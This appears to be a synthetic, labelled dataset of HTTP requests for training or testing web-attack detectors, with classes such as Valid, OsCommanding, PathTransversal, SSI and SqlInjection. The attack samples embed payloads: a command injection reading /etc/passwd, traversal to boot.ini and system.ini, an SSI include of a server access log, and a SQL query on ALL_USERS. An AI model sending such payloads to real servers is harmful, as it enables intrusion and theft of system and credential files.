GET /71QTC/hxoM6znlibKXk/Acetrxsrkll12ewe/cEZ9bW2yScjn/ou_o/5rssraz/vSyOd_AobPCzbodyRt/tnmi/39/neetti9rt/0form4LTUJF.php4?lushetesr=jjh3c&euTfnettrgasar=76&j9sJX=%25e%3Ehttps&etihmhdeejohdeq=ht1oq&deletewinntHmHiallO.@=u%5CctnllsIi&_kEAKHW=iuH%7Etad-ajeedsCenvbi&5n2ekltebi=ua9fu71e9am8exioc&reti9tRh2=%40tytlrkCVtwuofromsod&aeT=3&elxtteeii=635354&pMiioema6e=kNpUnngN&rernl=aBRuLkpXE9&r8Tincludekj=75311&edOetstLhlz=ds1LScIEB%40&s0aohdhryHtNavp=clEt HTTP/1.0
Host: 194.193.225.5:13
Connection: keep-alive
Accept: */*;q=0.3
Accept-Charset: *;q=0.7
Accept-Encoding: compress
Accept-Language: *
Cache-Control: no-transform
Client-ip: 17.253.204.167
Cookie: saosilchri=tF|;hor0tisd=slink;@JR7qM=78287231
Cookie2: $Version="898"
Date: Wed, 19 Dec 07 19:25:13 GMT
ETag: "04JB4gAQEilyGwNW6"
Expect: 100-continue
From: sctinh@65Ad.st
If-Modified-Since: Thu, 21 Oct 04 10:04:02 CET
If-Unmodified-Since: Thu, 04 Jun 09 20:37:28 GMT
If-Match: "5dvRrpMfjspWxC9ebQ"
If-None-Match: "AUlLWbCH9W3oUZfyH"
If-Range: Mon, 22 Mar 10 22:46:17 GMT
Max-Forwards: 8453
MIME-Version: 5.1
Pragma: no-cache
Proxy-Authorization: hhusoe ikNaeuH=urUeewe
Authorization: Basic N2hvdEFsZjoxb3NoNWU=
Range: -3,-37,4261-
Referer: /1onej6i/Btld3k/eycAdqac.js
TE: chunked,deflate;q=0.2,trailers
Trailer: If-Range
User-Agent: enaArEowhthiDa
UA-CPU: PowerPC
UA-Disp: 422,3598,8
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 8372x613
Via: FTP/8.0 www.w50mrni.tiff
Transfer-Encoding: compress
Upgrade: 9gt2/5.5, leOa/8.9
Warning: 172 www.gicpsf4l.css "oo512" "Thu, 06 Jul 06 16:00:23 UTC"
X-Forwarded-For: 223.124.189.8
X-Serial-Number: 2858071636366715430
----: ------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 1533
Start - Id: 43505
class: OsCommanding
GET /Co_A7_C3MmBl.3/tHeeS/e@Jo8/EHWRadminZ./dVocatBa4eO/inbill3rbormeogtmnb/sJPZcIWBqq/lwpUzKm0.4UpIu5nr/krsepaxoai/huBz/5p8rm/oknndy.cgi?WsambNDl58OJ=eNJRtE2M&QecpBz=eTnmaeideleteOt&eaegmdhsdenhoto=%250a+cat%250a++++%2Fetc%2Fpasswd+++%250a HTTP/1.0
Host: www.en26tl.org
Connection: close
Accept: */*;q=0.8
Accept-Charset: *;q=0.2
Accept-Encoding: *
Accept-Language: rEuG-f, lghOs-e;q=0.1, ryhPl-t;q=0.6, rnnhhrSE-epai
Cache-Control: max-age=346
Client-ip: 123.138.109.238
Cookie: Pp8noHi7nayle5=9095;0Adot=opun4Meen;tDideuHgL=ttrsmxx43aodmt;5O1uaot=$
Cookie2: $Version="626"
Date: Tue, 21 Oct 08 18:34:06 UTC
ETag: "1ZIJyiA7qSu4@.@P-w"
Expect: qEtoe
From: entRerd@7ndhcnQeej.be
If-Modified-Since: Mon, 08 Dec 08 16:01:11 GMT
If-Unmodified-Since: Sat, 19 Jul 08 07:18:23 UTC
If-Match: *
If-None-Match: "5jIqrngsvo7.AafNA"
If-Range: Mon, 03 Jul 06 13:27:32 CET
Max-Forwards: 35
MIME-Version: 3.4
Pragma: soH=eettxf
Proxy-Authorization: Basic bFJvZ25nOmVmVGNx
Authorization: Basic OW9iSTp6bGVlaXdhNQ==
Range: 32-61,4386-85
Referer: /rsnioonh/ahshExsi.msf
TE: trailers,trailers,trailers
Trailer: If-Range
User-Agent: Mozilla/3.2 (Machintosh; U; Mac OS X 5.1; ia-gd; rv:6.9.6) Gecko/19761068
UA-CPU: MIPS
UA-Disp: 777,376,8
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 5281x2497
Via: 8.4 www.noliB.js, ttwi7a/3.3 www.mno6re.html
Transfer-Encoding: itreo
Upgrade: nRo2i/0.2, uniywa/5.6, g4s/3.9, urxwij/6.4
Warning: 900 www.eenCnh.jpeg "aDmktlcy9embade" 
X-Forwarded-For: 106.96.131.159
X-Serial-Number: 521013041943
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 43505
Start - Id: 45402
class: PathTransversal
PUT /ovo02X52w5pcWtkDUf/6.CquDHMGR/o1TLvGPC7dr.dll? HTTP/1.0
Content-Length: 279
Content-Language: e
Content-Encoding: identity
Content-Location: /z2nelpc/igti/tagi.cgi
Content-MD5: eWQxYW1vaWFjNGFlaWVrcg==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 07 Jul 05 04:50:15 GMT
Last-Modified: Wed, 22 Mar 06 20:43:01 UTC
Host: www.e6lGe5e.org:1435
Connection: onki
Accept: image/*, audio/x-wav
Accept-Charset: *;q=0.5
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-transform
Client-ip: 182.249.119.41
Cookie: tntiyd5rh=gosi82y;7umto=DdGlibpswdt1%u;M8TP8.Os=bupa6;ah69tfo=0185336873;a6teeEdxdlaoSha=9798;5bnt1szthmz=3
Cookie2: $Version="269"
Date: Sun, 25 Jan 09 21:20:26 GMT
ETag: W/"-yfA6unXQjL3zd2"
Expect: ceauo
From: d1Subs@Oaeelb.fr
If-Modified-Since: Tue, 02 Jan 07 20:20:53 GMT
If-Unmodified-Since: Sat, 13 Nov 04 09:57:01 CET
If-Match: "Ca7G-c1Fsah1tqkn"
If-None-Match: *
If-Range: Fri, 17 Oct 08 08:28:41 CET
Max-Forwards: 74
MIME-Version: 1.9
Pragma: g=eLdcnsm
Proxy-Authorization: qei4S 0e1e=mede
Authorization: Digest username="isysa"
Range: 50-63221
Referer: /mcd0yn/bgeeylr/shrs/4oseai/aL3dl.dll
TE: trailers,deflate,deflate;q=0.5
Trailer: Accept-Charset
User-Agent: 3thc (i8lwTKj; y9yZ8miy2; r_4T5oAU@; 7T6D5fCyC; nmt1MnaMn)
UA-CPU: MIPS
UA-Disp: 088,174,32
UA-OS: Win95
UA-Color: color16
UA-Pixels: 789x027
Via: 5gamT/1.8 118.86.132.84, HTTP/4.3 253.95.173.116, ebtE/1.3 113.240.31.129
Transfer-Encoding: gzip
Upgrade: nhl/2.2, iq1t/0.4, vahc/6.4, rxeb/7.3, E6nr/6.9
Warning: 735 167.158.26.9:63108 "suudbN" "Wed, 11 Oct 06 14:19:30 GMT"
X-Forwarded-For: 32.85.66.113
X-Serial-Number: 279789
----: ---------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

xddlnhir=ysnyythes9HKjfzT&oPFNdzt7G='akL e et(&nhtgis=g.VRl6X-qahR&rNlesn8ratz4o=uHvIKr&nilan6asiaEi98=90859&eaecudYp=104118&ftiknte=4&itTenysg=8465641&setiEceboe=95850&teoi=nNRRkgC20Ot&zsiframe@29oinsertLA=nr>&CxDpPF=c:\windows\boot.ini&2zjMCwH=tee%ucl-tztlemetaea

End - Id: 45402
Start - Id: 13746
class: Valid
GET /i@SjwANfVZt5bV5.nZ@/stcohr8en/eyxb5WRORu/5lne6iPie7yqo14r9s/aileQeobtt/dhp7/tFbcrPUkH4YIN/deuTiSneaa3p/ah1Q.jDWvXZE4-a.css?adeew=9bT%5Dfe%7Ee&TSQFtmp7pszS=i4s0ayBiolryme&hotzanbdmph=tei5&wep=67504030&uxt3ttZ2cwc=0854470&i1uile=where348gwp-&Mh=18228&l4=4w1&jzIjttsfeiusnhd=r5rvcbfQIrO&wOoEhnheGnnr6iu=oohttpsia+fzk&9oudapgt7=nee5r HTTP/1.0
Host: www.iron.com
Connection: eooaKt
Accept: */*;q=0.6
Accept-Charset: *;q=0.8
Accept-Encoding: *
Accept-Language: oemhI-1oJE9hla, lace-wipo, ebehatd-nie, tteei-gagwt
Cache-Control: max-age=9126
Client-ip: 145.63.22.213
Cookie: Lttco=846;Fai4fabc0ahiked=ur;6sa=pscin;OKWUQkpdwhereC=4905;oyfeon7c=tHtPAf;shidEy=774486383
Cookie2: $Version="85"
Date: Sat, 19 Jul 08 14:12:45 GMT
ETag: "FxTdWi9J-MFVmjxcFGeq"
Expect: 100-continue
From: gnhB9o@rfci.com
If-Modified-Since: Mon, 16 Mar 09 03:45:31 CET
If-Unmodified-Since: Sat, 11 Feb 06 13:45:54 CET
If-Match: *
If-None-Match: *
If-Range: "YeAsL03Gk@jxZqQNfN"
Max-Forwards: 3148
MIME-Version: 4.8
Pragma: no-cache
Proxy-Authorization: Digest nc=bCafdbFc
Authorization: IatDe xTagi4Sc=fistaxdu
Range: -4
Referer: http://www.fosi7ar.it/edtcs/leise/eioyEn/tonQrr.pl
TE: trailers,trailers
Trailer: Cache-Control
User-Agent: Mozilla/1.3 (compatible; Konqueror/9.2; Win 9x; on3po4lnta; gx398txfn)
UA-CPU: PowerPC
UA-Disp: 173,9492,32
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 6985x6776
Via: 5.0 101.232.31.202, HTTP/6.8 251.111.146.109
Transfer-Encoding: deflate
Upgrade: l4tt/6.1, gtIh/6.6, nsetrs/8.9, h1ehro/2.2
Warning: 820 www.uproeo.htm "Ianeee" 
X-Forwarded-For: 60.68.206.39
X-Serial-Number: 6046766144734
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 13746
Start - Id: 39501
class: SSI
GET /ksisth7a/iOval2thB2hrd5R/r08vRWA_av/39j74Wk9n2P/4qyfm86-3j9Ftv07w/pL1jm6a/nbzsNLZo.I5Qw/o7hkeivra6useaStf/sk11GZRLt0./9LYVmXq8YRS/xhIei/5-Dmb.css? HTTP/1.1
Host: www.glepi.gov
Connection: close
Accept: video/*, video/mpeg
Accept-Charset: *;q=0.9
Accept-Encoding: gzip, deflate, compress;q=0.4
Accept-Language: *
Cache-Control: no-cache
Client-ip: 17.157.96.204
Cookie: VdBS=kuayr;t4m7leiiemb=X0apik8lo;aBnsa3ne=ocy2XYHiCRj
Date: Thu, 13 Mar 08 04:18:29 CET
ETag: W/"WZNJPRVhwKs5WbH1Gdm"
Expect: 100-continue
From: el2u@0la399.com
If-Modified-Since: Sat, 09 Oct 04 03:54:02 CET
If-Unmodified-Since: Thu, 05 Nov 09 18:25:24 CET
If-Match: "NZeBIhMyKWTlBIeZd3q"
If-None-Match: *
If-Range: Fri, 11 Nov 05 14:55:12 UTC
Max-Forwards: 82
MIME-Version: 1.1
Pragma: no-cache
Proxy-Authorization: 6eesqI biis=qhv8oi65
Authorization: vhnbe rHeihert=enipi
Referer: http://www.bfads.cz/oopo/TmaAmls/cdoy6/4ErettOt.nsf
TE: trailers,deflate;q=0.7,trailers
Trailer: Expect
User-Agent: <!--   #include virtual="/var/log/httpd/access.log"-->
UA-CPU: Sparc
UA-OS: Linux
UA-Color: color16
UA-Pixels: 296x5456
Via: HTTP/9.5 82.239.53.239:0, 8.9 251.218.108.166
Transfer-Encoding: bavrx
Warning: 903 11.205.255.14:699 "aie8fmms" "Sun, 25 Oct 09 02:11:26 CET"
X-Forwarded-For: 212.30.157.133
X-Serial-Number: 81323854011
----: --------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 39501
Start - Id: 42573
class: SqlInjection
GET /1aee/sjL5OPlASu_zqPrE8gB/o5cnoo/4pY9mtservicesetcMG3img-/ehTIltwAnhwte8naq/aUk-4MOfpB/t2l.pl?waiardpaeeO7pt=select+79rnbH+from+ALL_USERS&lor8aviTdtf9n=41&IfI9XgO=t5inHna%3Fd8pr HTTP/1.0
Host: www.hpch.biz:80
Connection: close
Accept: text/html;q=0.1, text/*, video/*;q=0.1
Accept-Charset: koi8-r, x-mac-arabic;q=0.5
Accept-Encoding: 
Accept-Language: AauhhM-r9wi2;q=0.7
Cache-Control: lsr=fsstEn
Client-ip: 197.109.140.61
Cookie: mEd=42;olhjtaZrNheifce= s+h3ntmpetebetweenTwt=;nwoesIAeyndieti=taw3 ur;W5eF7ZkWYO=3;nsi=1bi]R lh
Cookie2: $Version="533"
Date: Mon, 20 Jun 05 17:17:44 GMT
ETag: "AIbTkMC-@CHeNXLDldey"
Expect: shrot
From: tmTstilr@oerx.it
If-Modified-Since: Sat, 10 Apr 04 07:19:20 CET
If-Unmodified-Since: Sun, 01 Jan 06 24:54:21 GMT
If-Match: "9WySyjfEEFSA.5o"
If-None-Match: "v_DIQ3diczXHTWt@XTn@"
If-Range: Sat, 12 Sep 09 18:10:38 UTC
Max-Forwards: 77
MIME-Version: 2.8
Pragma: no-cache
Proxy-Authorization: Basic Nm9UYWV3c3I6bmUzYQ==
Authorization: ofrd qMdd=ptigE
Range: 5581-955144,-188690,326959-661
Referer: /otust.pdf
TE: chunked,trailers,gzip;q=0.6
Trailer: Expect
User-Agent: eriE/0.0.2.0
UA-CPU: MIPS
UA-Disp: 276,5579,16
UA-OS: Win95
UA-Color: color32
UA-Pixels: 161x8196
Via: aae/3.5 64.16.68.150, 1.8 www.bimenoc.js, 2.8 www.cyted.shtml:8338
Transfer-Encoding: Asgn
Upgrade: lxiev/4.8, Sc4/5.2, owd/0.5
Warning: 740 www.flc6.js "aobefTi4oh6lxaa" "Sat, 01 Jul 06 04:47:36 CET"
X-Forwarded-For: 149.227.177.29
X-Serial-Number: 81684
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 42573
Start - Id: 2105
class: Valid
GET /na/qT/oab/bTannt.dll?laheFs9h=s%26Lrc7us8bwg%40&Sie=lejanfdudntaodna1r&pir9r2t=eyD747&weambscEvbtz=tunion5dTtsooszte8i&otsrvroodlOsey=ueeiashutdown5wee&rs4auacslgsl=35490060&un0Raofreeshua=dtwget&neM9cs=00&t.qjYO3N=66&snudnqrpm0lo3z=earebE7s4e&t8hrtggvwq=ameNftea%3Dtmpsperlw+&7etlnii=2602591392&ebcuy78IjDz=6111152 HTTP/1.0
Host: www.qcmbsbf.ch
Connection: ipoEdb
Accept: application/postscript
Accept-Charset: *;q=0.0
Accept-Encoding: *
Accept-Language: *;q=0.7
Cache-Control: no-transform
Client-ip: 152.109.97.244
Cookie: uin=2&ag5;tcwbtpwsvhe=femRiaooohlafine
Cookie2: $Version="7"
Date: Thu, 08 Jul 04 21:49:35 GMT
ETag: "9n1bjFooGMi0kZKt0a9"
Expect: nsgId
From: nl0fyslt@tlSn3roowo.be
If-Modified-Since: Tue, 27 Nov 07 08:31:07 UTC
If-Unmodified-Since: Tue, 29 Dec 09 22:49:52 CET
If-Match: *
If-None-Match: *
If-Range: Sat, 24 Nov 07 08:19:33 GMT
Max-Forwards: 9152
MIME-Version: 2.0
Pragma: r6btwo=n
Proxy-Authorization: NTLM c3RpYW93ZHJybG1ybmhoM3N5eEVjaG5OM3dpc2VCc2dhZXlvMTFjZ2QxYw==
Authorization: Digest response="5E07471bb944aF57CD47C235c6389bdB"
Range: 621-,04-,-085540
Referer: http://www.eies.biz/7l2Ng/dWIan6ol/oxEetsio.jpg
TE: trailers
Trailer: Upgrade
User-Agent: cnxoen5sfpn
UA-CPU: Sparc
UA-Disp: 4115,383,8
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 3159x969
Via: b2n/8.9 150.244.128.216, FTP/5.4 www.eqPgaih9.jpeg
Transfer-Encoding: gzip
Upgrade: gknraU/3.9, fTtni/6.7, lssm/8.2, Jw7uEL/4.0
Warning: 176 192.65.47.200 "nii9pvEb56r" "Thu, 12 Nov 09 15:01:18 UTC"
X-Forwarded-For: 132.82.181.214
X-Serial-Number: 86831
----: ---------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 2105
Start - Id: 26950
class: Valid
GET /nwz.DlKCksPK8/d3oIsawteau/YVlNlikeTTn.jpg?i1ia=ii+&ledkml=i5dg&D0updatebrtd5=5087424&seens=uooptet HTTP/1.1
Host: 16.104.113.147
Connection: keep-alive
Accept: image/png;q=0.6, text/plain, audio/*
Accept-Charset: *
Accept-Encoding: *;q=0.3
Accept-Language: r8ha-3odl;q=0.9, lmh-g3il53t, o-i2, d-hh
Cache-Control: no-cache
Client-ip: 239.237.217.85
Cookie: erl=sga
Cookie2: $Version="50"
Date: Sun, 17 Oct 04 01:59:48 CET
ETag: W/"GQ2mJ2z7lr1cSiyA47Vr"
Expect: 100-continue
From: naeolznc@aqswey.biz
If-Modified-Since: Wed, 17 Jan 07 20:29:45 CET
If-Unmodified-Since: Fri, 10 Nov 06 11:18:16 CET
If-Match: *
If-None-Match: "DO5r2C4nPJzGkHrleMGW"
If-Range: Wed, 28 Jan 04 09:28:59 CET
Max-Forwards: 6804
MIME-Version: 7.2
Pragma: no-cache
Proxy-Authorization: Digest realm
Authorization: Djeafa 1natw=goasendd
Range: 1287-,6-111,8884-
Referer: http://www.eod1.biz/nymxsbe/Uaeu/moup/aookh/gpntlaS.rar
TE: chunked,trailers,deflate;q=0.2
Trailer: If-Unmodified-Since
User-Agent: foumGEaah
UA-CPU: Sparc
UA-Disp: 967,053,32
UA-OS: Win9x
UA-Color: color16
UA-Pixels: 6546x3443
Via: FTP/2.7 www.EhwAepi.png, FTP/2.4 www.58ckU.jpeg:25218
Transfer-Encoding: gzip
Upgrade: 4dtel/9.0, ditos1/6.4, ruIehu/9.5, reatd/7.5
Warning: 423 253.222.102.25:6796 "eaiebbsv" "Thu, 25 May 06 10:01:32 GMT"
X-Forwarded-For: 188.77.210.37
X-Serial-Number: 781010344531
----: -----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 26950
Start - Id: 45420
class: PathTransversal
PUT /an7/dSuq/sioemr/s5QQDDz.tiff? HTTP/1.0
Content-Length: 313
Content-Language: eep,6o,o5eaD
Content-Encoding: identity
Content-Location: http://ntEiE0.gov/eneBrae/3tar.exe
Content-MD5: M2c2dHRlbmhrbnRyM25hTw==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 15 May 04 09:48:32 UTC
Last-Modified: Tue, 15 Nov 05 23:14:13 UTC
Host: 132.166.11.175:57794
Connection: close
Accept: application/postscript;q=0.8, video/mpeg, audio/x-wav;q=0.0
Accept-Charset: koi8;q=0.1, iso-8859-4;q=0.5
Accept-Encoding: *;q=0.3
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 186.229.57.172
Cookie: swhhlsoanolc=xtermeewget3tq%e;ssylqlrotsiu=253816321;eedkwn7nfci=5301;positionrNJd= h
Cookie2: $Version="2"
Date: Sun, 01 Jan 06 20:55:08 UTC
ETag: W/"YIv7-YIQ3UOzG@Xq"
Expect: 100-continue
From: d1Subs@Oaeelb.fr
If-Modified-Since: Thu, 11 Jun 09 10:06:56 CET
If-Unmodified-Since: Sun, 11 Oct 09 24:38:49 GMT
If-Match: *
If-None-Match: *
If-Range: Wed, 24 May 06 16:31:04 GMT
Max-Forwards: 9
MIME-Version: 4.3
Pragma: lk='aog'
Proxy-Authorization: eOpgl ldhoil=meunte
Authorization: Basic Ym1laWhlYTppbjZ0cnM=
Range: -292636,082693-
Referer: /epeeu.cgi
TE: trailers,trailers
Trailer: Proxy-Authorization
User-Agent: irOr0etaz (dyeKfblbm; uJCaZvcy@; kbv1ExAo; eOzySlJMaQ; mVd2.xu)
UA-CPU: PowerPC
UA-Disp: 282,5050,16
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 863x2272
Via: 3.8 202.169.70.21, erin/9.9 www.trdir.png
Transfer-Encoding: identity
Upgrade: nhl/2.2, iq1t/0.4, vahc/6.4, rxeb/7.3, E6nr/6.9
Warning: 226 191.247.153.35 "oywrpbp" "Tue, 07 Jun 05 04:43:35 GMT"
X-Forwarded-For: 88.16.159.203
X-Serial-Number: 7007774658100
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

iiotsgeauhrrrou=2&etyiavtmaGairo=175429&SHdt=auTkMrV&daeiI7coa9=rf&eeuQdbsacexitY=1902114548&YwmOapE=%e0uinwmotpobe&ihtYs=72826&body@stdinRCz9v=..........................WINNTsystem.ini&r7ebpw8rictn=908&rholdto4prtgj4Q=ede~6in;e&dee7erlem1=43&tiosai=19818&_m@C=ametao/7&aahctrtdur=109&8ohxxghO07kcyZ9=5641

End - Id: 45420
Start - Id: 34715
class: Valid
POST /sVI3itKipN/rq8t03w/6iZN/ZHiWZm8Lscriptmetadocument/Ov5oM0replaceexecZ7ffu/h4t9wenn8enotrnaha/7prdirh/zpassthruTPVyorDkQaim/hnzumrgehdtzgdk60ev/tO4tmEsk.nsf? HTTP/1.0
Content-Length: 99
Content-Language: eu5aaNo,ainbnwC,3
Content-Encoding: gzip
Content-Location: http://eoFylabm.cz/ywtt/eyze/d0sss/reObnfg/biywehas.msf
Content-MD5: aXBuc3RzaXVjcnJpaGVsaA==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 20 Nov 08 10:42:14 UTC
Last-Modified: Tue, 31 May 05 08:28:40 UTC
Host: www.ieuanO.it:80
Connection: keep-alive
Accept: audio/*;q=0.2, image/gif;q=0.9, video/quicktime;q=0.6
Accept-Charset: *
Accept-Encoding: *;q=0.3
Accept-Language: aoOmnrt-Riexwhys;q=0.7, tmioket-sir, in-n9pw, rz2egod-ybkqews
Cache-Control: a8pe9a=se
Client-ip: 51.127.174.180
Cookie: ZbG9qhbdnetcatVmi=asylconnect;25nrce4=uziy6t0eness
Cookie2: $Version="20"
Date: Thu, 04 Mar 10 02:09:30 CET
ETag: "ghddgygvcZw2JBfz"
Expect: 100-continue
From: eegGaa@nxna0n.uk
If-Modified-Since: Sat, 12 Dec 09 05:10:17 UTC
If-Unmodified-Since: Tue, 23 May 06 23:14:31 UTC
If-Match: *
If-None-Match: "pd2lnoqdJQkYOfej7q"
If-Range: Wed, 27 Apr 05 17:58:52 UTC
Max-Forwards: 633
MIME-Version: 5.6
Pragma: aic=s
Proxy-Authorization: Digest realm
Authorization: oMaee6 eudjami=nlnieitl
Range: 27601-82680,576792-311040,-975285
Referer: /adu2rand/utekn/atao/6g9bh.php3
TE: gzip;q=0.6,gzip;q=0.9
Trailer: Cache-Control
User-Agent: jziieUid4S (zNp6Wk_-; gOnZAXlXOn; oYK-QKu8x)
UA-CPU: x86
UA-Disp: 659,9099,16
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 420x8395
Via: FTP/1.3 www.nsnciaww.tiff, oioi8/2.7 83.236.182.171:1
Transfer-Encoding: deflate
Upgrade: nq8o/9.4, hsea/1.7
Warning: 270 www.akhXhs.js "ogdA" "Wed, 23 Dec 09 01:56:59 UTC"
X-Forwarded-For: 102.210.121.17
X-Serial-Number: 70295990861852353496
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

sult=74374&maudckssnNutSh6=fielem 9hE&rjeOimo1eehhEu=%8cT&9tHarmiLaeAsra=tQwSiwk5&71YMwJ=87166178

End - Id: 34715
Start - Id: 20970
class: Valid
GET /i3oXsH/edztNenoheneot/hX-TV6C2@Zn0kqGWw/qMx/Fxj.scOcopyN5QWfchild./tqrqzxxETN/uKAr.html?iij4i8soevpo3S0=ncH&ggYo=tece7div%7Erei%245i%27%5B&pfao0rh6t=593&nyifuDrsileA9sW=+2ipE&vtppdecsMnl=%3F%5DaN%3A&ewtIm1owni=Y&alirauihwscest=eBtV HTTP/1.1
Host: 138.187.70.39
Connection: Nik52h
Accept: video/*;q=0.2
Accept-Charset: windows-874, cp-950, cp-932;q=0.8
Accept-Encoding: *
Accept-Language: nrdqw-yostxd
Cache-Control: min-fresh=79112
Client-ip: 8.17.126.237
Cookie: exfTcvf=h2<tere1dmha;0cg=otemda7ebeeami;mNueet=dQHL0;ckctttac= nO0body r(wg>iner;ee=325;brh2dtsnnmlnqdt=71550824
Cookie2: $Version="77"
Date: Thu, 19 Aug 04 16:06:47 CET
ETag: "7xF35b.sGTGR-FPYGX"
Expect: 100-continue
From: stnsist@ee8nh.de
If-Modified-Since: Fri, 18 Feb 05 22:02:37 CET
If-Unmodified-Since: Fri, 10 Sep 04 23:39:34 GMT
If-Match: "_E3sujSLLY@GUsF0"
If-None-Match: *
If-Range: *
Max-Forwards: 840
MIME-Version: 1.5
Pragma: no-cache
Proxy-Authorization: Digest uri=http://trntegwe.gov/aaae/hicet/u5e6b.aspx
Authorization: Basic aWk5aFdSYW86RWlheXNhcw==
Range: 225798-,299422-
Referer: http://www.eceewxj8.biz/6rTgTdzR.txt
TE: trailers,chunked;q=0.3
Trailer: Authorization
User-Agent: Mozilla/9.7 (Machintosh; U; PPC Mac OS X 4.8; ih-em; rv:6.1.2) Gecko/15237923
UA-CPU: 68000
UA-Disp: 3276,4561,8
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 212x4647
Via: 0.6 76.0.98.162, HTTP/5.8 88.29.129.72:19
Transfer-Encoding: gzip
Upgrade: tknsdI/6.1, bao9sk/7.3, wfso/2.7, lrm/1.0
Warning: 818 39.101.24.238 "Ei4etc3nfbsi2nwj" 
X-Forwarded-For: 36.101.205.182
X-Serial-Number: 70412595449023727026
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 20970
Start - Id: 16547
class: Valid
GET /8qI@kHczYPEiDq4SK/nMtP8kHRFsJnC/aU1f@@C6Xqyam/0G_xtermXbNp_UJ/ld0rpGnGl09MNAB4KZ/xaFzHL9C-CfqA/tyedk/9p.5QNEn/t5a.3hTVv-1dGjw1N/oeaatSsdiuocw/w7rW5rI1R4E4jCy/7e.js?zEGWqOb8B07=iVt8EbB%40jgcB&EHDvKB=lFUN1ks&lvC5psnJTaG-q=4678&dBfoietli=ans&KUconnectperltj.Ck=%7CNi&ssn=3piarviegals&oaito=bunigroup+byefNettoif&etdq=510818&tmamH4aoe=1752672869&icteye=vdrop%40ecmdr%29stgl%3AnetcatcnetcatL&S8varML-txw@@=ulmall HTTP/1.1
Host: 221.22.78.223
Connection: keep-alive
Accept: image/*;q=0.4, video/mpeg, image/jpeg;q=0.4
Accept-Charset: *
Accept-Encoding: *;q=0.7
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 110.75.170.196
Cookie: @jNUx_=%]aOw93Rdr;ovt=svLx5luI4N5z;7wesuo=4
Cookie2: $Version="6"
Date: Sat, 05 Apr 08 09:35:46 UTC
ETag: W/"tbbxWf8euU2lA2q61VUP"
Expect: 6otl
From: o7mnatoB@rrengt.ch
If-Modified-Since: Fri, 26 Dec 08 05:50:11 CET
If-Unmodified-Since: Fri, 11 Sep 09 21:54:46 GMT
If-Match: *
If-None-Match: *
If-Range: Sun, 08 Aug 04 13:39:25 UTC
Max-Forwards: 70
MIME-Version: 1.2
Pragma: TqOttoc=eiuetiiy
Proxy-Authorization: Digest qop=itaaniiM
Authorization: Digest opaque="0eeimsg"
Range: -098113
Referer: http://www.9hh5m.uk/asfri/etvhTn/ofith/Lx4w.dll
TE: trailers
Trailer: If-Range
User-Agent: Mozilla/2.7 (compatible; Konqueror/6.9; WinNT; rieia; eehc3d7y)
UA-CPU: MIPS
UA-Disp: 2808,9760,16
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 9430x4545
Via: FTP/8.6 www.edxec.png
Transfer-Encoding: gzip
Upgrade: yru/2.9, iNeed/4.4, EOio/3.5, a5xeU/5.9, 5omle/9.1
Warning: 574 www.ragnqoh.htm "mte2te" 
X-Forwarded-For: 184.226.48.9
X-Serial-Number: 4070028617537255
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~

null

End - Id: 16547
Start - Id: 938
class: Valid
GET /wYE/IsswcWgh/naoTl9hatndhbl.swf?gme17EuF3=%40cqhttpsi+aeEtma%7CIito&iaVelv=231&Bltce5iensht7it=55jg07H&lbh=oniEernaqeb5wtwhpr&OQtpJtSL@0aV=i%3A+ri&znrEfioArow=ciEn8M&hohdie=%40&PU8ZUy=2956112522&grecrdahmetansg=mhomevayTl+n&utitetstaf=9024357&XJhxUsystem=lBS&ineh=rrsotjyrosmsvl&da2Eothaegu=%40 HTTP/1.0
Host: www.rguhRte.uk
Connection: close
Accept: */*
Accept-Charset: windows-1251, iso-8859-8-i;q=0.8, x-mac-chinesesimp, windows-1258, cp-932;q=0.6
Accept-Encoding: deflate, gzip, deflate;q=0.4
Accept-Language: tlmtjyj5-1d;q=0.2, tn-zeainq, sniuOt9l-28u;q=0.9
Cache-Control: no-cache
Client-ip: 47.91.174.157
Cookie: mnnhai=x6tin?e
Cookie2: $Version="2"
Date: Mon, 05 Nov 07 09:05:21 UTC
ETag: "jr06Kr9AbFL4OWD"
Expect: 100-continue
From: shr8m@eagitmhb.de
If-Modified-Since: Sat, 31 Jul 04 04:21:41 GMT
If-Unmodified-Since: Wed, 01 Feb 06 03:37:53 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 0266
MIME-Version: 3.0
Pragma: no-cache
Proxy-Authorization: noeoas ndiTeO=reehtr
Authorization: NTLM YU5iZTFpZDd1N2Zlb2M1ZWVvZ2VvY3RobmZBYnVyc28=
Range: 37-165,99813-448132
Referer: /oOnosin3/u3ur/unneri.mdb
TE: trailers,trailers
Trailer: Expect
User-Agent: Mozilla/7.0 (X11; U; Solaris 9.8; nl-ir; rv:9.3.3) Gecko/53649155
UA-CPU: Sparc
UA-Disp: 705,7453,8
UA-OS: Windows 95
UA-Color: color16
